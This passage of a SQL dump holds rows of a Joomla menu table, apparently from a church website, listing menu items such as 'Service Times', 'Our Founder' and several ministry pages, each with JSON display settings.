'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 272, 273, 0, '*', 0),
(119, 'sidebarmenu', 'Level 2', 'level-21', '', 'accordion-a/level-21', 'index.php?option=com_content&view=article&id=5', 'component', 1, 117, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 274, 275, 0, '*', 0),
(120, 'sidebarmenu', 'Level 2', 'level-22', '', 'accordion-a/level-22', 'index.php?option=com_content&view=article&id=5', 'component', 1, 117, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 276, 277, 0, '*', 0),
(121, 'sidebarmenu', 'Accordion B', 'accordion-b', '', 'accordion-b', '', 'separator', 1, 1, 1, 0, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"menu_image\":\"\",\"menu_text\":1}', 279, 284, 0, '*', 0),
(122, 'sidebarmenu', 'Level 2', 'level-2', '', 'accordion-b/level-2', 'index.php?option=com_content&view=article&id=5', 'component', 1, 121, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 280, 281, 0, '*', 0),
(123, 'sidebarmenu', 'Level 2', 'level-21', '', 'accordion-b/level-21', 'index.php?option=com_content&view=article&id=5', 'component', 1, 121, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 282, 283, 0, '*', 0),
(126, 'mainmenu', 'Category List', 'category-list', '', 'joomla/category-list', 'index.php?option=com_content&view=category&id=22', 'component', -2, 107, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"page_subheading\":\"\",\"show_pagination_limit\":\"\",\"filter_field\":\"\",\"show_headings\":\"\",\"list_show_date\":\"\",\"date_format\":\"\",\"list_show_hits\":\"\",\"list_show_author\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"display_num\":\"10\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":1,\"page_heading\":\"Blog\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 184, 185, 0, '*', 0),
(127, 'mainmenu', 'Category Blog', 'category-blog', '', 'joomla/category-blog', 'index.php?option=com_content&view=category&layout=blog&id=22', 'component', -2, 107, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"layout_type\":\"blog\",\"show_category_heading_title_text\":\"\",\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"show_cat_tags\":\"\",\"page_subheading\":\"\",\"num_leading_articles\":\"4\",\"num_intro_articles\":\"2\",\"num_columns\":\"2\",\"num_links\":\"0\",\"multi_column_order\":\"\",\"show_subcategory_content\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_title\":\"\",\"link_titles\":\"1\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 182, 183, 0, '*', 0),
(128, 'mainmenu', 'Single Article', 'single-article', '', 'joomla/single-article', 'index.php?option=com_content&view=article&id=5', 'component', -2, 107, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 180, 181, 0, '*', 0),
(129, 'mainmenu', 'Login', 'login', '', 'joomla/login', 'index.php?option=com_users&view=login', 'component', -2, 107, 2, 25, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"login_redirect_url\":\"\",\"logindescription_show\":\"1\",\"login_description\":\"\",\"login_image\":\"\",\"logout_redirect_url\":\"\",\"logoutdescription_show\":\"1\",\"logout_description\":\"\",\"logout_image\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":1,\"page_heading\":\"Login\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 192, 193, 0, '*', 0),
(130, 'mainmenu', 'Registration', 'registration', '', 'joomla/registration', 'index.php?option=com_users&view=registration', 'component', -2, 107, 2, 25, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":1,\"page_heading\":\"Registration\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 194, 195, 0, '*', 0),
(132, 'mainmenu', 'About Us', 'about-us', '', 'about-us', '', 'separator', 1, 1, 1, 0, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 9, 26, 0, '*', 0),
(151, 'mainmenu', 'Contact Category', 'contact-category', '', 'joomla/contact-category', 'index.php?option=com_contact&view=category&id=8', 'component', -2, 107, 2, 8, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_subcat_desc\":\"\",\"show_cat_items\":\"\",\"show_pagination_limit\":\"\",\"show_headings\":\"\",\"show_position_headings\":\"\",\"show_email_headings\":\"\",\"show_telephone_headings\":\"\",\"show_mobile_headings\":\"\",\"show_fax_headings\":\"\",\"show_suburb_headings\":\"\",\"show_state_headings\":\"\",\"show_country_headings\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"initial_sort\":\"\",\"presentation_style\":\"\",\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_links\":\"\",\"linka_name\":\"\",\"linkb_name\":\"\",\"linkc_name\":\"\",\"linkd_name\":\"\",\"linke_name\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\",\"show_feed_link\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 186, 187, 0, '*', 0),
(152, 'mainmenu', 'Contact Item', 'contact-item', '', 'joomla/contact-item', 'index.php?option=com_contact&view=contact&id=2', 'component', -2, 107, 2, 8, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"presentation_style\":\"\",\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_links\":\"\",\"linka_name\":\"\",\"linkb_name\":\"\",\"linkc_name\":\"\",\"linkd_name\":\"\",\"linke_name\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 188, 189, 0, '*', 0),
(155, 'mainmenu', 'Web Links', 'web-links', '', 'joomla/web-links', 'index.php?option=com_weblinks&view=categories&id=0', 'component', -2, 107, 2, 21, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_base_description\":\"1\",\"categories_description\":\"We are regularly out on the Web. When we find a great site we list it.\",\"maxLevelcat\":\"-1\",\"show_empty_categories_cat\":\"\",\"show_subcat_desc_cat\":\"\",\"show_cat_num_links_cat\":\"\",\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_links\":\"\",\"show_pagination_limit\":\"\",\"show_headings\":\"\",\"show_link_description\":\"\",\"show_link_hits\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":1,\"page_heading\":\"Web Links\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 190, 191, 0, '*', 0),
(158, 'mainmenu', 'Portfolio', 'portfolio', '', 'portfolio', 'index.php?option=com_content&view=category&layout=blog&id=27', 'component', -2, 1, 1, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"layout_type\":\"blog\",\"show_category_heading_title_text\":\"\",\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"show_cat_tags\":\"\",\"page_subheading\":\"\",\"num_leading_articles\":\"4\",\"num_intro_articles\":\"2\",\"num_columns\":\"2\",\"num_links\":\"0\",\"multi_column_order\":\"\",\"show_subcategory_content\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"0\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"0\",\"link_author\":\"\",\"show_create_date\":\"0\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 159, 178, 0, '*', 0),
(162, 'mainmenu', 'Anointed Family Heads', 'afh', '', 'ministries/afh', 'index.php?option=com_content&view=article&id=116', 'component', 0, 253, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 118, 119, 0, '*', 0),
(163, 'mainmenu', 'Married Couples', 'married-couples', '', 'ministries/married-couples', 'index.php?option=com_content&view=article&id=24', 'component', -2, 253, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 130, 131, 0, '*', 0),
(164, 'mainmenu', 'Royal Seed Fellowship', 'royal-seed', '', 'ministries/royal-seed', 'index.php?option=com_content&view=article&id=120', 'component', 0, 253, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 126, 127, 0, '*', 0),
(165, 'mainmenu', 'Young Adults', 'young-adults', '', 'ministries/young-adults', 'index.php?option=com_content&view=article&id=26', 'component', -2, 253, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 128, 129, 0, '*', 0),
(174, 'mainmenu', 'The church', 'the-church', '', 'about-us/the-church', 'index.php?option=com_content&view=article&id=27', 'component', 1, 132, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 10, 11, 0, '*', 0),
(195, 'mainmenu', 'Service Times', 'service-times', '', 'about-us/service-times', 'index.php?option=com_content&view=article&id=28', 'component', 1, 132, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 12, 13, 0, '*', 0),
(196, 'mainmenu', 'Broadcast Schedule', 'broadcast-schedule', '', 'resources/broadcast-schedule', 'index.php?option=com_content&view=article&id=113', 'component', 1, 102, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 112, 113, 0, '*', 0),
(197, 'mainmenu', 'Our Founder', 'our-founder', '', 'about-us/our-founder', 'index.php?option=com_content&view=article&id=88', 'component', 1, 132, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 14, 15, 0, '*', 0),
(199, 'mainmenu', 'Question & Answer', 'question-answer', '', 'about-us/question-answer', 'index.php?option=com_content&view=article&id=32', 'component', 0, 132, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, 